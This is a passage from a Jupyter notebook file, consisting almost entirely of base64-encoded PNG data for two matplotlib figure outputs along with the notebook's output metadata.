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\n",
"text/plain": [
"<matplotlib.figure.Figure at 0x7fc7a7258630>"
]
},
"metadata": {},
"output_type": "display_data"
},
{
"data": {
"image/png": "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